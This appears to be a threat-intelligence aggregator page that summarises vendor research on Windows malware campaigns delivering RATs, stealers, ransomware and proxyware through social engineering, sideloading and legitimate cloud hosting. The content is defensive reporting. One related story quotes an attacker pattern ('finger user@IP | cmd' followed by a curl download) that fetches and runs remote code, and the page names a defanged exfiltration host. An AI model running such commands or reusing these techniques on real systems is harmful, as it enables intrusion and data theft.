Windows Malware Campaigns Using Social Engineering and Legitimate Platforms to Deliver RATs, Stealers, and Proxyware
Multiple research reports detailed Windows-focused malware delivery chains that rely on social engineering and abuse of legitimate services to blend into normal enterprise traffic. FortiGuard Labs described a multi-stage campaign targeting users in Russia that starts with business-themed decoy documents and scripts, then escalates to security-control bypass and surveillance before deploying Amnesia RAT and ultimately ransomware with widespread file encryption. A notable technique in that intrusion is the abuse of Defendnot (a Windows Security Center trust-model research tool) to disable Microsoft Defender, while payloads are hosted modularly across public cloud services (e.g., GitHub for scripts and Dropbox for binaries) to improve resilience and complicate takedowns.
Separately, ReliaQuest reported attackers using LinkedIn private messages to build trust with targets and deliver a WinRAR SFX that triggers DLL sideloading via a legitimate PDF reader, then establishes persistence (Registry Run key) and executes Base64-encoded shellcode in-memory to load a RAT-like payload. Trend Micro and Koi Security documented Evelyn Stealer, which weaponizes malicious VS Code extensions to drop a downloader DLL (e.g., Lightshot.dll), run hidden PowerShell to fetch runtime.exe, and inject the stealer into grpconv.exe, exfiltrating data (credentials, cookies, wallets, screenshots, Wi‑Fi credentials) to server09.mentality[.]cloud over FTP. AhnLab ASEC also reported proxyjacking activity in South Korea attributed to Larva‑25012, distributing proxyware disguised as a Notepad++ installer and evolving evasion (e.g., injecting into Windows Explorer and using Python-based loaders) to monetize victims’ bandwidth via unauthorized proxyware installation.
Get ahead of threats like this
Mallory correlates global threat intelligence with your attack surface — know if you’re exposed before adversaries strike.
How this story unfolded
5 events from the most recent confirmed update back to the earliest known activity.
Trend Micro details Evelyn Stealer's credential and crypto theft capabilities
Trend Micro disclosed that the Evelyn Stealer campaign targets software developers to steal developer credentials and cryptocurrency-related data, with compromised developer machines potentially serving as entry points into wider organizations. The researchers said the malware injects itself into a legitimate Windows process in memory, uses anti-analysis techniques, and exfiltrates collected data to a remote server over FTP as a ZIP archive.
FortiGuard Labs discloses multi-stage Windows malware campaign targeting Russia
FortiGuard Labs revealed a high-severity campaign primarily targeting Windows users in Russia through social-engineering lures in compressed archives containing decoy business documents and a malicious LNK. The infection chain fetched GitHub-hosted scripts, used obfuscated VBScript for in-memory staging and UAC abuse, disabled Microsoft Defender including via Defendnot, exfiltrated data and screenshots over Telegram, and deployed Amnesia RAT, Hakuna Matata–derived ransomware, and a WinLocker.
ReliaQuest uncovers LinkedIn DM phishing campaign using DLL sideloading
ReliaQuest reported a phishing campaign in which attackers used LinkedIn private messages to lure targets into downloading a malicious WinRAR self-extracting archive. The payload chain abused DLL sideloading through a legitimate PDF reader, dropped a portable Python interpreter, established Run-key persistence, and attempted to connect to an external server for RAT-style access and data exfiltration.
Koi Security identifies malicious VS Code extensions delivering Evelyn Stealer
Koi Security previously documented three malicious Microsoft Visual Studio Code extensions that installed a downloader DLL, used PowerShell to fetch a second-stage payload, and ultimately delivered the Evelyn Stealer malware to target software developers.
ASEC reports ongoing Larva-25012 proxyjacking campaign in South Korea
AhnLab ASEC reported an ongoing campaign by threat actor Larva-25012 that disguises malware as a Notepad++ installer to covertly install proxyware such as Infatica and DigitalPulse on South Korean systems. The campaign used malvertising on illegal or cracked software portals, GitHub-hosted payloads, and evolving loaders including NodeJS- and Python-based DPLoader variants with persistence and defense-evasion features.
Related entities
Vulnerabilities, threat actors, malware, products, organizations, and breaches Mallory has linked to this story.
Sources
5 references tracked. Mallory keeps watching after this page renders.
Inside a Multi-Stage Windows Malware Campaign
feeds.fortinet.com
Open sourceInside a Multi-Stage Windows Malware Campaign | FortiGuard Labs
fortinet.com
Open sourceHackers Use LinkedIn Messages to Spread RAT Malware Through DLL Sideloading
thehackernews.com
Open sourceEvelyn Stealer Malware Abuses VS Code Extensions to Steal Developer Credentials and Crypto
thehackernews.com
Open sourceProxyware Disguised as Notepad++ Tool - ASEC
asec.ahnlab.com
Open sourceSee the full picture, correlated to your attack surface.
Map indicators from this story to your assets and identify affected systems in minutes.
Every observed campaign, victim, and pivot linked to actors named in this story.
Malware, exploits, and IOCs connected to the activity described here.
YARA, Sigma, and Snort rules deployed to your SIEM as soon as they’re published.
Get matching new stories delivered to your team as they break — not the next morning.
Ask questions about this story and take action on the answers.
Related stories
Other stories Mallory is tracking that overlap on entities, sources, or topic labels.
Malware Campaigns Using Social Engineering to Deliver Proxyware, RATs, and Ransomware
Multiple active malware campaigns are using **social engineering** and **trojanized content** to compromise Windows systems, with lures ranging from pirated software downloads to business and shipping documents. AhnLab reported a “proxyjacking” operation attributed to **Larva-25012** that distributes fake installers (notably a trojanized *Notepad++* package) via cracked-software sites; the `Setup.zip` bundle includes a legitimate `Setup.exe` plus a malicious sideloaded DLL (`TextShaping.dll`) that decrypts and installs **DPLoader** for persistent command retrieval and follow-on payload delivery. The malware also tampers with defenses by changing Microsoft Defender settings (e.g., exclusions, reduced notifications, and blocking sample submission) to reduce detection while monetizing victims’ bandwidth through installed **proxyware**. Separately, FortiGuard Labs described a Russia-focused, multi-stage intrusion chain that abuses trusted services (**GitHub** and **Dropbox**) for payload hosting and weaponizes **Defendnot** (a Windows Security Center trust-model research tool) to disable **Microsoft Defender** before deploying a ransomware payload. Fortinet also documented phishing campaigns using weaponized shipping-themed Word documents to deliver **Remcos RAT**, including fileless execution behavior and exploitation of `CVE-2017-11882` (Microsoft Equation Editor) via remotely fetched templates. These campaigns reinforce the operational risk from user-driven execution paths (pirated installers and document lures), “living off the land” techniques, and defense evasion through both policy tampering and security tooling abuse.
Mar 21, 2026
Malware Delivery via Social Engineering: Phishing Lures, Fake Browser Alerts, and Paste-and-Run Payloads
Multiple threat reports describe **social-engineering-driven malware delivery** leading to remote access and follow-on payload deployment. Fortinet observed a **multi-stage phishing campaign targeting users in Russia** that delivers **Amnesia RAT** and ransomware via business-themed decoy documents and a malicious `.lnk` shortcut using a double extension (e.g., `*.txt.lnk`). The infection chain uses public cloud services for staging—**GitHub** for scripts and **Dropbox** for binary payloads—and abuses **defendnot** to trick Windows into believing a third-party AV is installed, effectively disabling **Microsoft Defender** before later-stage execution. Separately, Huntress attributed activity to **KongTuke**, which uses **malicious browser extensions** to display fake “browser crash” security alerts (“**CrashFix**”) that pressure users into running attacker-provided commands, and also deploys a Python RAT dubbed **ModeloRAT**. ModeloRAT is described as heavily obfuscated, using **Windows Registry** persistence and **RC4**-encrypted communications, with the ability to deliver additional payloads (DLLs, executables, scripts). Red Canary’s January intelligence update highlights **Scarlet Goldfinch** activity using **paste-and-run** lures and a notable technique of using the Windows `finger` client to pull remote content (e.g., `finger user@IP | cmd`), followed by `curl` download of an archive masquerading as a PDF and extraction via `tar -xf`, culminating in **Remcos** (and sometimes **NetSupport**) delivered via **DLL sideloading**.
Mar 21, 2026
Windows Malware Campaigns Abusing Trusted Tools and Cloud Hosting for Stealthy Execution
Multiple Windows-focused malware campaigns were reported leveraging *trusted distribution and execution paths* rather than exploiting software vulnerabilities. One campaign attributed to **Larva-25012** disguised proxyware as legitimate *Notepad++* installers distributed via fake cracked-software portals and deceptive ads, primarily impacting South Korea. The payloads were hosted on GitHub and delivered as MSI/ZIP packages containing legitimate components plus malicious DLLs, using **DLL side-loading** and process injection into **Windows Explorer** to deploy proxyware (e.g., **Infatica** and **DigitalPulse**) for **proxyjacking**—monetizing victims’ internet bandwidth by reselling access through their networks. A separate multi-stage Windows malware operation used business-themed lures and weaponized archives containing **LNK** shortcuts to run hidden **PowerShell** with execution-policy bypass, pulling an obfuscated loader from GitHub and using legitimate services (e.g., **Dropbox**) to blend into normal traffic. Fortinet-reported tradecraft included persistence, decoy document generation, and beaconing via the **Telegram Bot API**, followed by defense evasion through abuse of **Defendnot** to disable Microsoft Defender before dropping follow-on payloads such as ransomware, banking trojans, and surveillance tooling. Additional reporting highlighted a broader trend of attackers abusing legitimate infrastructure and admin tooling (including **RMM** software after credential theft) to establish persistent access, while generic “common threats” content provided no incident-specific intelligence.
Mar 21, 2026